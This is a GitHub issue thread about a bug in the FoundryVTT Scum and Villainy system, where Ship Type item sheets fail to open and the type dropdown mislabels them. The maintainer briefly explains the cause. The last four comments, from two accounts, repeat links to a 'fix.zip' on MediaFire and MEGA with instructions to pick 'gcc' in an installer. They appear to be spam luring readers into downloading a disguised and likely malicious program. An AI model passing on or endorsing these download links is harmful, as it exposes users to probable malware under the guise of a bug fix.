### ISSUE TITLE
Cannot open "Ship Type" items 

### ISSUE THREAD

**Issue by Gtaray** [drewg13/foundryvtt-scum-and-villainy#83]
There's two pieces to this that seem like they're related.

I cannot open up the sheet for ship types. I've tried the following ways to access the sheet, and none work
- Open the "Ship Types" compendium and click on a ship type in the list.
- Import a Ship Type and try to open it from the Items panel.
- Create a new Ship Type (this is labeled "Crew Type" in the dropdown, see below).

In all three case I get the following error in the console
![image](https://github.com/user-attachments/assets/933657f8-6eb4-4b04-9433-e4ce42c0ae97)

Seemingly related, the "Type" drop down does not show "Ship Type", it shows "Crew Type" instead.
![image](https://github.com/user-attachments/assets/c5dfb500-8568-48ad-8a5a-c40d5d8dfe96)

I'm running on Windows 10
Foundry version 12 Build 331
Scum & Villainy version 3.3.1

**Comment by drewg13** [comment]
Good catch, I got caught out by a deprecated variable declaration in the editor helper that I didn't catch on that sheet.  Easy fix though.

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
